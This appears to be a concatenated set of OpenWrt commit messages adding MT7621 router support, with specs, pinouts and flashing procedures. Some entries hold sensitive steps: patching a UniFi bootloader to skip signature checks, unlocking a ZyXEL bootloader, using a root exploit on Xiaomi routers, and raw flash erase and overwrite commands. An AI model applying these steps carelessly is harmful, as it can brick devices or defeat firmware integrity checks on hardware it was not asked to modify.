Specifications
SoC: MT7621
CPU: 880 MHz
Flash: 16 MiB
RAM: 128 MiB
WLAN: 2.4 GHz b/g/n, 5 GHz a/n/ac
MT7603E / MT7615E
Ethernet: 5x Gbit ports
Installation
There are two known options:
1) The Luci-based UI.
2) Press and hold the reset button during power up.
The router will request 'recovery.bin' from a TFTP server at
192.168.1.88.
Both options require a signed firmware binary.
The openwrt image supplied by cudy is signed and can be used to
install unsigned images.
R4 & R5 need to be shorted (0-100Ω) for the UART to work.
Signed-off-by: Leon M. George <leon@georgemail.eu>
[remove non-required switch-port node - remove trgmii phy-mode]
Signed-off-by: David Bauer <mail@david-bauer.net>
This patch adds support for TP-Link Archer C6U v1 (EU).
The device is also known in some market as Archer C6 v3.
This patch supports only Archer C6U v1 (EU).
Specifications:
--------------
* SoC: Mediatek MT7621AT 2C2T, 880MHz
* RAM: 128MB DDR3
* Flash: 16MB SPI NOR flash (Winbond 25Q128)
* WiFi 5GHz: Mediatek MT7613BEN (2x2:2)
* WiFi 2.4GHz: Mediatek MT7603EN (2x2:2)
* Ethernet: MT7630, 5x 1000Base-T.
* LED: Power, WAN, LAN, WiFi 2GHz and 5GHz, USB
* Buttons: Reset, WPS.
* UART: Serial console (115200 8n1), J1(GND:3)
* USB: One USB2 port.
Installation:
------------
Install the OpenWrt factory image for C6U is from the
TP-Link web interface.
1) Go to "Advanced/System Tools/Firmware Update".
2) Click "Browse" and upload the OpenWrt factory image:
openwrt-ramips-mt7621-tplink_archer-c6u-v1-squashfs-factory.bin.
3) Click the "Upgrade" button, and select "Yes" when prompted.
Recovery to stock firmware:
--------------------------
The C6U bootloader has a failsafe mode that provides a web
interface (running at 192.168.0.1) for reverting back to the
stock TP-Link firmware. The failsafe interface is triggered
from the serial console or on failed kernel boot. Unfortunately,
there's no key combination that enables the failsafe mode. This
gives us two options for recovery:
1) Recover using the serial console (J1 header).
The recovery interface can be selected by hitting 'x' when
prompted on boot.
2) Trigger the bootloader failsafe mode.
A more dangerous option is force the bootloader into
recovery mode by erasing the OpenWrt partition from the
OpenWrt's shell - e.g "mtd erase firmware". Please be
careful, since erasing the wrong partition can brick
your device.
MAC addresses:
-------------
OEM firmware configuration:
D8:07:B6:xx:xx:83 : 5G
D8:07:B6:xx:xx:84 : LAN (label)
D8:07:B6:xx:xx:84 : 2.4G
D8:07:B6:xx:xx:85 : WAN
Signed-off-by: Georgi Vlaev <georgi.vlaev@konsulko.com>
The patch adds support for the TP-Link Archer A6 v3
The router is sold in US and India with FCC ID TE7A6V3
Specification
-------------
MediaTek MT7621 SOC
RAM: 128MB DDR3
SPI Flash: W25Q128 (16MB)
Ethernet: MT7530 5x 1000Base-T
WiFi 5GHz: Mediatek MT7613BE
WiFi 2.4GHz: Mediatek MT7603E
UART/Serial: 115200 8n1
Device Configuration & Serial Port Pins
---------------------------------------
ETH Ports: LAN4 LAN3 LAN2 LAN1 WAN
_______________________
| |
Serial Pins: | VCC GND TXD RXD |
|_____________________|
LEDs: Power Wifi2G Wifi5G LAN WAN
Build Output
------------
The build will generate following set of files
[1] openwrt-ramips-mt7621-tplink_archer-a6-v3-initramfs-kernel.bin
[2] openwrt-ramips-mt7621-tplink_archer-a6-v3-squashfs-factory.bin
[3] openwrt-ramips-mt7621-tplink_archer-a6-v3-squashfs-sysupgrade.bin
How to Use - Flashing from TP-Link Web Interface
------------------------------------------------
* Go to "Advanced/System Tools/Firmware Update".
* Click "Browse" and upload the OpenWrt factory image: factory.bin[2]
* Click the "Upgrade" button, and select "Yes" when prompted.
TFTP Booting
------------
Setup a TFTP boot server with address 192.168.0.5.
While starting U-boot press '4' key to stop autoboot.
Copy the initramfs-kernel.bin[1] to TFTP server folder, rename as test.bin
From u-boot command prompt run tftpboot followed by bootm.
Recovery
--------
Archer A6 V3 has recovery page activated if SPI booting from flash fails.
Recovery page can be activated from serial console only.
Press 'x' while u-boot is starting
Note: TFTP boot can be activated only from u-boot serial console.
Device recovery address: 192.168.0.1
Thanks to: Frankis for Randmon MAC address fix.
Signed-off-by: Vinay Patil <post2vinay@gmail.com>
[remove superfluous factory image definition, whitespacing]
Signed-off-by: David Bauer <mail@david-bauer.net>
The ZyXEL NR7101 is an 802.3at PoE powered 5G outdoor (IP68) CPE
with integrated directional 5G/LTE antennas.
Specifications:
- SoC: MediaTek MT7621AT
- RAM: 256 MB
- Flash: 128 MB MB NAND (MX30LF1G18AC)
- WiFi: MediaTek MT7603E
- Switch: 1 LAN port (Gigabiti)
- 5G/LTE: Quectel RG502Q-EA connected by USB3 to SoC
- SIM: 2 micro-SIM slots under transparent cover
- Buttons: Reset, WLAN under same cover
- LEDs: Multicolour green/red/yellow under same cover (visible)
- Power: 802.3at PoE via LAN port
The device is built as an outdoor ethernet to 5G/LTE bridge or
router. The Wifi interface is intended for installation and/or
temporary management purposes only.
UART Serial:
57600N1
Located on populated 5 pin header J5:
[o] GND
[ ] key - no pin
[o] RX
[o] TX
[o] 3.3V Vcc
Remove the SIM/button/LED cover, the WLAN button and 12 screws
holding the back plate and antenna cover together. The GPS antenna
is fixed to the cover, so be careful with the cable. Remove 4
screws fixing the antenna board to the main board, again being
careful with the cables.
A bluetooth TTL adapter is recommended for permanent console
access, to keep the router water and dustproof. The 3.3V pin is
able to power such an adapter.
MAC addresses:
OpenWrt OEM Address Found as
lan eth2 08:26:97:*:*:BC Factory 0xe000 (hex), label
wlan0 ra0 08:26:97:*:*:BD Factory 0x4 (hex)
wwan0 usb0 random
WARNING!!
ISP managed firmware might at any time update itself to a version
where all known workarounds have been disabled. Never boot an ISP
managed firmware with a SIM in any of the slots if you intend to use
the router with OpenWrt. The bootloader lock can only be disabled with
root access to running firmware. The flash chip is physically
inaccessible without soldering.
Installation from OEM web GUI:
- Log in as "supervisor" on https://172.17.1.1/
- Upload OpenWrt initramfs-recovery.bin image on the
Maintenance -> Firmware page
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- (optional) Copy OpenWrt to the recovery partition. See below
- Sysupgrade to the OpenWrt sysupgrade image and reboot
Installation from OEM ssh:
- Log in as "root" on 172.17.1.1 port 22022
- scp OpenWrt initramfs-recovery.bin image to 172.17.1.1:/tmp
- Prepare bootloader config by running:
nvram setro uboot DebugFlag 0x1
nvram setro uboot CheckBypass 0
nvram commit
- Run "mtd_write -w write initramfs-recovery.bin Kernel" and reboot
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- (optional) Copy OpenWrt to the recovery partition. See below
- Sysupgrade to the OpenWrt sysupgrade image and reboot
Copying OpenWrt to the recovery partition:
- Verify that you are running a working OpenWrt recovery image
from flash
- ssh to root@192.168.1.1 and run:
fw_setenv CheckBypass 0
mtd -r erase Kernel2
- Wait while the bootloader mirrors Image1 to Image2
NOTE: This should only be done after successfully booting the OpenWrt
recovery image from the primary partition during installation. Do
not do this after having sysupgraded OpenWrt! Reinstalling the
recovery image on normal upgrades is not required or recommended.
Installation from Z-Loader:
- Halt boot by pressing Escape on console
- Set up a tftp server to serve the OpenWrt initramfs-recovery.bin
image at 10.10.10.3
- Type "ATNR 1,initramfs-recovery.bin" at the "ZLB>" prompt
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- Sysupgrade to the OpenWrt sysupgrade image
NOTE: ATNR will write the recovery image to both primary and recovery
partitions in one go.
Booting from RAM:
- Halt boot by pressing Escape on console
- Type "ATGU" at the "ZLB>" prompt to enter the U-Boot menu
- Press "4" to select "4: Entr boot command line interface."
- Set up a tftp server to serve the OpenWrt initramfs-recovery.bin
image at 10.10.10.3
- Load it using "tftpboot 0x88000000 initramfs-recovery.bin"
- Boot with "bootm 0x8800017C" to skip the 380 (0x17C) bytes ZyXEL
header
This method can also be used to RAM boot OEM firmware. The warning
regarding OEM applies! Never boot an unknown OEM firmware, or any OEM
firmware with a SIM in any slot.
NOTE: U-Boot configuration is incomplete (on some devices?). You may
have to configure a working mac address before running tftp using
"setenv eth0addr <mac>"
Unlocking the bootloader:
If you are unebale to halt boot, then the bootloader is locked.
The OEM firmware locks the bootloader on every boot by setting
DebugFlag to 0. Setting it to 1 is therefore only temporary
when OEM firmware is installed.
- Run "nvram setro uboot DebugFlag 0x1; nvram commit" in OEM firmware
- Run "fw_setenv DebugFlag 0x1" in OpenWrt
NOTE:
OpenWrt does this automatically on first boot if necessary
NOTE2:
Setting the flag to 0x1 avoids the reset to 0 in known OEM
versions, but this might change.
WARNING:
Writing anything to flash while the bootloader is locked is
considered extremely risky. Errors might cause a permanent
brick!
Enabling management access from LAN:
Temporary workaround to allow installing OpenWrt if OEM firmware
has disabled LAN management:
- Connect to console
- Log in as "root"
- Run "iptables -I INPUT -i br0 -j ACCEPT"
Notes on the OEM/bootloader dual partition scheme
The dual partition scheme on this device uses Image2 as a recovery
image only. The device will always boot from Image1, but the
bootloader might copy Image2 to Image1 under specific conditions. This
scheme prevents repurposing of the space occupied by Image2 in any
useful way.
Validation of primary and recovery images is controlled by the
variables CheckBypass, Image1Stable, and Image1Try.
The bootloader sets CheckBypass to 0 and reboots if Image1 fails
validation.
If CheckBypass is 0 and Image1 is invalid then Image2 is copied to
Image1.
If CheckBypass is 0 and Image2 is invalid, then Image1 is copied to
Image2.
If CheckBypass is 1 then all tests are skipped and Image1 is booted
unconditionally. CheckBypass is set to 1 after each successful
validation of Image1.
Image1Try is incremented if Image1Stable is 0, and Image2 is copied to
Image1 if Image1Try is 3 or larger. But the bootloader only tests
Image1Try if CheckBypass is 0, which is impossible unless the booted
image sets it to 0 before failing.
The system is therefore not resilient against runtime errors like
failure to mount the rootfs, unless the kernel image sets CheckBypass
to 0 before failing. This is not yet implemented in OpenWrt.
Setting Image1Stable to 1 prevents the bootloader from updating
Image1Try on every boot, saving unnecessary writes to the environment
partition.
Keeping an OpenWrt initramfs recovery as Image2 is recommended
primarily to avoid unwanted OEM firmware boots on failure. Ref the
warning above. It enables console-less recovery in case of some
failures to boot from Image1.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
So far, board.d files were having execute bit set and contained a
shebang. However, they are just sourced in board_detect, with an
apparantly unnecessary check for execute permission beforehand.
Replace this check by one for existance and make the board.d files
"normal" files, as would be expected in /etc anyway.
Note:
This removes an apparantly unused '#!/bin/sh /etc/rc.common' in
target/linux/bcm47xx/base-files/etc/board.d/01_network
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The TP-Link EAP235-Wall is a wall-mounted, PoE-powered AC1200 access
point with four gigabit ethernet ports.
When connecting to the device's serial port, it is strongly advised to
use an isolated UART adapter. This prevents linking different power
domains created by the PoE power supply, which may damage your devices.
The device's U-Boot supports saving modified environments with
`saveenv`. However, there is no u-boot-env partition, and saving
modifications will cause the partition table to be overwritten. This is
not an issue for running OpenWrt, but will prevent the vendor FW from
functioning properly.
Device specifications:
* SoC: MT7621DAT
* RAM: 128MiB
* Flash: 16MiB SPI-NOR
* Wireless 2.4GHz (MT7603EN): b/g/n, 2x2
* Wireless 5GHz (MT7613BEN): a/n/ac, 2x2
* Ethernet: 4× GbE
* Back side: ETH0, PoE PD port
* Bottom side: ETH1, ETH2, ETH3
* Single white device LED
* LED button, reset button (available for failsafe)
* PoE pass-through on port ETH3 (enabled with GPIO)
Datasheet of the flash chip specifies a maximum frequency of 33MHz, but
that didn't work. 20MHz gives no errors with reading (flash dump) or
writing (sysupgrade).
Device mac addresses:
Stock firmware uses the same MAC address for ethernet (on device label)
and 2.4GHz wireless. The 5GHz wireless address is incremented by one.
This address is stored in the 'info' ('default-mac') partition at an
offset of 8 bytes.
From OEM ifconfig:
eth a4:2b:b0:...:88
ra0 a4:2b:b0:...:88
rai0 a4:2b:b0:...:89
Flashing instructions:
* Enable SSH in the web interface, and SSH into the target device
* run `cliclientd stopcs`, this should return "success"
* upload the factory image via the web interface
Debricking:
U-boot can be interrupted during boot, serial console is 57600 baud, 8n1
This allows installing a sysupgrade image, or fixing the device in
another way.
* Access serial header from the side of the board, close to ETH3,
pin-out is (1:TX, 2:RX, 3:GND, 4:3.3V), with pin 1 closest to ETH3.
* Interrupt bootloader by holding '4' during boot, which drops the
bootloader into its shell
* Change default 'serverip' and 'ipaddr' variables (optional)
* Download initramfs with `tftpboot`, and boot image with `bootm`
# tftpboot 84000000 openwrt-initramfs.bin
# bootm
Revert to stock:
Using the tplink-safeloader utility from the firmware-utils package,
TP-Link's firmware image can be converted to an OpenWrt-compatible
sysupgrade image:
$ ./staging_dir/host/bin/tplink-safeloader -B EAP235-WALL-V1 \
-z EAP235-WALLv1_XXX_up_signed.bin -o eap235-sysupgrade.bin
This can then be flashed using the OpenWrt sysupgrade interface. The
image will appear to be incompatible and must be force flashed, without
keeping the current configuration.
Known issues:
- DFS support is incomplete (known issue with MT7613)
- MT7613 radio may stop responding when idling, reboot required.
This was an issue with the ddc75ff704 version of mt76, but appears to
have improved/disappeared with bc3963764d.
Error notice example:
[ 7099.554067] mt7615e 0000:02:00.0: Message 73 (seq 1) timeout
Hardware was kindly provided for porting by Stijn Segers.
Tested-by: Stijn Segers <foss@volatilesystems.org>
Signed-off-by: Sander Vanheule <sander@svanheule.net>
Xiaomi Mi Router 4 is the same as Xiaomi Mi Router 3G, except for
the RAM (256Mib→128Mib), LEDs and gpio (MiNet button).
Specifications:
Power: 12 VDC, 1 A
Connector type: barrel
CPU1: MediaTek MT7621A (880 MHz, 4 cores)
FLA1: 128 MiB (ESMT F59L1G81MA)
RAM1: 128 MiB (ESMT M15T1G1664A)
WI1 chip1: MediaTek MT7603EN
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: U.FL
WI2 chip1: MediaTek MT7612EN
WI2 802dot11 protocols: an+ac
WI2 MIMO config: 2x2:2
WI2 antenna connector: U.FL
ETH chip1: MediaTek MT7621A
Switch: MediaTek MT7621A
UART Serial
[o] TX
[o] GND
[o] RX
[ ] VCC - Do not connect it
MAC addresses as verified by OEM firmware:
use address source
LAN *:c2 factory 0xe000 (label)
WAN *:c3 factory 0xe006
2g *:c4 factory 0x0000
5g *:c5 factory 0x8000
Flashing instructions:
1.Create a simple http server (nginx etc)
2.set uart enable
To enable writing to the console, you must reset to factory settings
Then you see uboot boot, press the keyboard 4 button (enter uboot command line)
If it is not successful, repeat the above operation of restoring the factory settings.
After entering the uboot command line, type:
setenv uart_en 1
saveenv
boot
3.use shell in uart
cd /tmp
wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin
wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin
mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin kernel1
mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin rootfs0
nvram set flag_try_sys1_failed=1
nvram commit
reboot
4.login to the router http://192.168.1.1/
Installation via Software exploit
Find the instructions in the https://github.com/acecilia/OpenWRTInvasion
Signed-off-by: Dmytro Oz <sequentiality@gmail.com>
[commit message facelift, rebase onto shared DTSI/common device
definition, bump uboot-envtools]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Hardware
--------
MediaTek MT7621AT
256M DDR3
32M SPI-NOR
MediaTek MT7603 2T2R 802.11n 2.4GHz
MediaTek MT7915 2T2R 802.11ax 5GHz
Not Working
-----------
- Bluetooth (connected to UART3)
UART
----
UART is located in the lower left corner of the board. Pinout is
0 - 3V3 (don't connect)
1 - RX
2 - TX
3 - GND
Console is 115200 8N1.
Boot
----
1. Connect to the serial console and connect power.
2. Double-press ESC when prompted
3. Set the fdt address
$ fdt addr $(fdtcontroladdr)
4. Remove the signature node from the control FDT
$ fdt rm /signature
5. Transfer and boot the OpenWrt initramfs image to the device.
Make sure to name the file C0A80114.img and have it reachable at
192.168.1.1/24
$ tftpboot; bootm
Installation
------------
1. Connect to the booted device at 192.168.1.20 using username/password
"ubnt".
2. Update the bootloader environment.
$ fw_setenv devmode TRUE
$ fw_setenv boot_openwrt "fdt addr \$(fdtcontroladdr);
fdt rm /signature; bootubnt"
$ fw_setenv bootcmd "run boot_openwrt"
3. Transfer the OpenWrt sysupgrade image to the device using SCP.
4. Check the mtd partition number for bs / kernel0 / kernel1
$ cat /proc/mtd
5. Set the bootselect flag to boot from kernel0
$ dd if=/dev/zero bs=1 count=1 of=/dev/mtdblock4
6. Write the OpenWrt sysupgrade image to both kernel0 as well as kernel1
$ dd if=openwrt.bin of=/dev/mtdblock6
$ dd if=openwrt.bin of=/dev/mtdblock7
7. Reboot the device. It should boot into OpenWrt.
Below are the original installation instructions prior to the discovery
of "devmode=TRUE". They are not required for installation and are
documentation only.
The bootloader employs signature verification on the FIT image
configurations. This way, booting unauthorized image without patching
the bootloader is not possible. Manually configuring the bootcmd in the
U-Boot envronment won't work, as this is restored to the default value
if modified.
The bootloader is made up of three different parts.
1. The SPL performing early board initialization and providing a XModem
recovery in case the PBL is missing
2. The PBL being the primary U-Boot application and containing the
control FDT. It is LZMA packed with a uImage header.
3. A Ubiquiti standalone U-Boot application providing the main boot
routine as well as their recovery mechanism.
In a perfect world, we would only replace the PBL, as the SPL does not
perform checks on the PBLs integrity. However, as the PBL is in the same
eraseblock as the SPL, we need to at least rewrite both.
The bootloader will only verify integrity in case it has a "signature"
node in it's control device-tree. Renaming the signature node to
something else will prevent this from happening.
Warning: These instructions are based on the firmware intially
shipped with the device and potentially brick your device in a way it
can only be recovered using a SPI flasher.
Only (!) proceed if you understand this!
1. Extract the bootloader from the U-Boot partition using the OpenWrt
initramfs image.
2. Split the bootloader into it's 3 components:
$ dd if=bootloader.bin of=spl.bin bs=1 skip=0 count=45056
$ dd if=bootloader.bin of=pbl.uimage bs=1 skip=45056 count=143360
$ dd if=bootloader.bin of=ubnt.uimage bs=1 skip=188416
3. Strip the uImage header from the PBL
$ dd if=pbl.uimage of=pbl.lzma bs=64 skip=1
4. Decompress the PBL
$ lzma -d pbl.lzma --single-stream
The decompressed PBL sha256sum should be
d8b406c65240d260cf15be5f97f40c1d6d1b6e61ec3abed37bb841c90fcc1235
5. Open the decompressed PBL using your favorite hexeditor. Locate the
control FDT at offset 0x4CED0 (0xD00DFEED). At offset 0x4D5BC, the
label for the signature node is located. Rename the "signature"
string at this offset to "signaturr".
The patched PBL sha256sum should be
d028e374cdb40ba44b6e3cef2e4e8a8c16a3b85eb15d9544d24fdd10eed64c97
6. Compress the patched PBL
$ lzma -z pbl --lzma1=dict=67108864
The resulting pbl.lzma file should have the sha256sum
7ae6118928fa0d0b3fe4ff81abd80ecfd9ba2944cb0f0a462b6ae65913088b42
7. Create the PBL uimage
$ SOURCE_DATE_EPOCH=1607909492 mkimage -A mips -O u-boot -C lzma
-n "U-Boot 2018.03 [UniFi,v1.1.40.71]" -a 84000000 -e 84000000
-T firmware -d pbl.lzma patched_pbl.uimage
The resulting patched_pbl.uimage should have the sha256sum
b90d7fa2dcc6814180d3943530d8d6b0d6a03636113c94e99af34f196d3cf2ce
8. Reassemble the complete bootloader
$ dd if=patched_pbl.uimage of=aligned_pbl.uimage bs=143360 count=1
conv=sync
$ cat spl.bin > patched_uboot.bin
$ cat aligned_pbl.uimage >> patched_uboot.bin
$ cat ubnt.uimage >> patched_uboot.bin
The resulting patched_uboot.bin should have the sha256sum
3e1186f33b88a525687285c2a8b22e8786787b31d4648b8eee66c672222aa76b
9. Transfer your patched bootloader to the device. Also install the
kmod-mtd-rw package using opkg and load it.
$ insmod mtd-rw.ko i_want_a_brick=1
Write the patched bootloader to mtd0
$ mtd write patched_uboot.bin u-boot
10. Erase the kernel1 partition, as the bootloader might otherwise
decide to boot from there.
$ mtd erase kernel1
11. Transfer the OpenWrt sysupgrade image to the device and install
using sysupgrade.
FIT configurations
------------------
In the future, the MT7621 UniFi6 family can be supported by a single
OpenWrt image.
config@1: U6 Lite
config@2: U6 IW
config@3: U6 Mesh
config@4: U6 Extender
config@5: U6 LR-EA (Early Access - GA is MT7622)
Signed-off-by: David Bauer <mail@david-bauer.net>
Specifications:
- SoC: MediaTek MT7621AT
- RAM: 128 MB (DDR3)
- Flash: 16 MB (SPI NOR)
- WiFi: MediaTek MT7615N (x2)
- Switch: 1 WAN, 4 LAN (Gigabit)
- Ports: 1 USB 2.0, 1 USB 3.0
- Buttons: Reset, WiFi Toggle, WPS
- LEDs: Power, Internet, WiFi 2.4G WiFi 5G, USB 2.0, USB 3.0
The R1 revision is identical to the A1 revision except
- No Config2 Parition, therefore
- factory partition resized to 64k from 128K
- Firmware partition offset is 0x50000 not 0x60000
- Firmware partitions size increased by 64K
- Firmware partition type is "denx,uimage", not "sge,uimage"
- Padding of image creation "uimage-padhdr 96" removed
Installation:
- Older firmware versions: put the factory image on a USB stick, turn on
the telnet console, and flash using the following cmd
"fw_updater Linux /mnt/usb_X_X/firmware.bin"
- D-Link FailsafeUI:
Power down the router, press and hold the reset button, then
re-plug it. Keep the reset button pressed until the internet LED stops
flashing, then jack into any lan port and manually assign a static IP
address in 192.168.0.0/24 other than 192.168.0.0 (e.g. 192.168.0.2)
and go to http://192.168.0.1
Flash with the factory image.
Signed-off-by: Andrew Pikler <andrew.pikler@gmail.com>
The GL-MT1300 is a high-performance new generation pocket-sized router
that offers a powerful hardware and first-class cybersecurity protocol
with unique and modern design.
Specifications:
- SoC: MT7621A, Dual-Core @880MHz
- RAM: 256 MB DDR3
- Flash: 32 MB
- Ethernet: 3 x 10/100/1000: 2 x LAN + 1 x WAN
- Wireless: 1 x MT7615D Dual-Band 2.4GHz(400Mbps) + 5GHz(867Mbps)
- USB: 1 x USB 3.0 port
- Slot: 1 x MicroSD card slot
- Button: 1 x Reset button
- Switch: 1 x Mode switch
- LED: 1 x Blue LED + 1 x White LED
MAC addresses based on vendor firmware:
WAN : factory 0x4000
LAN : Mac from factory 0x4000 + 1
2.4GHz : factory 0x4
5GHz : Mac form factory 0x4 + 1
Flashing instructions:
1.Connect to one of LAN ports.
2.Set the static IP on the PC to 192.168.1.2.
3.Press the Reset button and power the device (do not release the button).
After waiting for the blue led to flash 5 times, the white led will
come on and release the button.
4.Browse the 192.168.1.1 web page and update firmware according to web
tips.
5.The blue led will flash when the firmware is being upgraded.
6.The blue led stops blinking to indicate that the firmware upgrade is
complete and U-Boot automatically starts the firmware.
For more information on GL-MT1300, see the OFFICIAL GL.iNet website:
https://www.gl-inet.com/products/gl-mt1300/
Signed-off-by: Xinfa Deng <xinfa.deng@gl-inet.com>
[add input-type for switch, wrap long line in 10_fix_wifi_mac]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This aligns the device/image names of the older Xiaomi Mi Router
devices with their "friendly" model and DEVICE_MODEL properties.
This also reintroduces consistency with the newer devices already
following that scheme.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
SoC: MediaTek MT7621ST (880 MHz)
FLASH: 16 MiB (Macronix MX25L12835FM2I-10G)
RAM: 128 MiB (Nanya NT5CB64M16FP-DH)
WiFi: MediaTek MT7603EN bgn 2x2:2
WiFi: MediaTek MT7612EN an 2x2:2
BTN: Reset, WPS
LED: - Power
- WiFi 2.4 GHz
- WiFi 5 GHz
- WAN
- LAN {1-4}
- USB {1-2}
UART: UART is present as pin hole next to the aluminium capacitor.
3V3 - RX - GND - TX / 115200-8N1
3V3 is the nearest on the aluminium capacitor and nut hole (pin1).
USB: 2 ports
POWER: 12VDC, 1.5A (Barrel 5.5x2.1)
Installation:
Via TFTP:
Set your computers IP-Address to 192.168.1.75
Power up the Router with the Reset button pressed.
Release the Reset button after 5 seconds.
Upload OpenWRT sysupgrade image via TFTP:
tftp -4 -v -m binary 192.168.1.1 -c put IMAGE
MAC addresses:
0x4 *:98 2g/wan, label
0x22 *:9c
0x28 *:98
0x8004 *:9c 5g/lan
Though addresses are written to 0x22 and 0x28, it appears that the
vendor firmware actually only uses 0x4 and 0x8004. Thus, we do the
same here.
Signed-off-by: Pavel Chervontsev <cherpash@gmail.com>
[add MAC address overview, add label-mac-device, fix IMAGE_SIZE]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This device has previously been supported by the image
for Xiaomi Mi Router 3G v2. Since this is not obvious, the
4A is marketed as a new major revision and it also seems to
have a different bootloader, this will be both more tidy and
more helpful for the users.
Apart from that, note that there also is a 100M version of
the device that uses mt7628 platform, so a specifically named
image will also prevent confusion in this area.
Specifications:
- SoC: MediaTek MT7621
- Flash: 16 MiB NOR SPI
- RAM: 128 MiB DDR3
- Ethernet: 3x 10/100/1000 Mbps (switched, 2xLAN + WAN)
- WIFI0: MT7603E 2.4GHz 802.11b/g/n
- WIFI1: MT7612E 5GHz 802.11ac
- Antennas: 4x external (2 per radio), non-detachable
- LEDs: Programmable "power" LED (two-coloured, yellow/blue)
Non-programmable "internet" LED (shows WAN activity)
- Buttons: Reset
Installation:
Bootloader won't accept any serial input unless "boot_wait" u-boot
environment variable is changed to "on".
Vendor firmware won't accept any serial input until "uart_en" is
set to "1".
Using the https://github.com/acecilia/OpenWRTInvasion exploit you
can gain access to shell to enable these options:
To enable uart keyboard actions - 'nvram set uart_en=1'
To make uboot delay boot work - 'nvram set boot_wait=on'
Set boot delay to 5 - 'nvram set bootdelay=5'
Then run 'nvram commit' to make the changes permanent.
Once in the shell (following the OpenWRTInvasion instructions) you
can then run the following to flash OpenWrt and then reboot:
'cd /tmp; curl https://downloads.openwrt.org/...-sysupgrade.bin
--output firmware.bin; mtd -e OS1 -r write firmware.bin OS1'
Suggested-by: David Bentham <db260179@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-2640 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (blue/orange), Internet (blue/orange), WiFi 2.4G (blue),
WiFi 5G (blue), USB 3.0 (blue), USB 2.0 (blue)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:a7 (label)
wan factory 0xe006 *:aa
2.4 factory 0xe000 +1 *:a8
5.0 factory 0xe000 +2 *:a9
Seems like vendor didn't replace the dummy entries in the calibration data.
Signed-off-by: James McGuire <jamesm51@gmail.com>
[fix device definition title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
While we mostly use the ucidef_set_led_* functions directly in 01_leds
we still have the set_wifi_led function in parallel for several old
devices. This is not only inconsistent with the other definitions,
it also links to the wlan0 interface instead of using a phy trigger
which would be independent of the interface name (and is used for
all newer devices anyway). Apart from that, the standard names
"wifi" and "wifi-led" are not very helpful in a world with different
radio bands either.
Thus, this patch removes the set_wifi_led function and puts the
relevant commands into the cases explicitly. This makes the
mechanism used more evident and will hopefully lead to some future
improvements or at least prevent some copy-pasting of the old
setups.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
In ramips, it's not common to use an alias for specifying the WiFi
LED; actually only one device uses this mechanism (TL-WR841N v14).
Particularly since the WiFi LEDs are typically distinguished between
2.4G and 5G etc. it is also not very useful for this target.
Thus, this patch removes the setup lines for this mechanism and
converts the TL-WR841N v14 to the normal setup.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Like in the previous patch for ath79 target, this will remove the
"devicename" from LED labels in ramips as well.
The devicename is removed in DTS files and 01_leds, consolidation
of definitions into DTSI files is done where (easily) possible,
and migration scripts are updated.
For the latter, all existing definitions were actually just
devicename migrations anyway. Therefore, those are removed and
a common migration file is created in target base-files. This is
actually another example of how the devicename removal makes things
easier.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This submission relied heavily on the work of
Santiago Rodriguez-Papa <contact at rodsan.dev>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Winbond W632GG6MB-12 (256M DDR3-1600)
* Flash: Winbond W29N01HVSINA (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7603E/MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
The uci-default mechanism to update the compat-version was only
meant for early DSA-adopters, which should have updated by now.
Remove this workaround again in order to prevent the intended
experiences for all the other people.
This reverts:
a9703db72030 ("mvebu: fix sysupgrade experience for early DSA-adopters")
86c89bf5e8f5 ("kirkwood: fix sysupgrade experience for early DSA-adopters")
Partially reverted:
1eac573b5304 ("ramips: mt7621: implement compatibility version for DSA migration")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
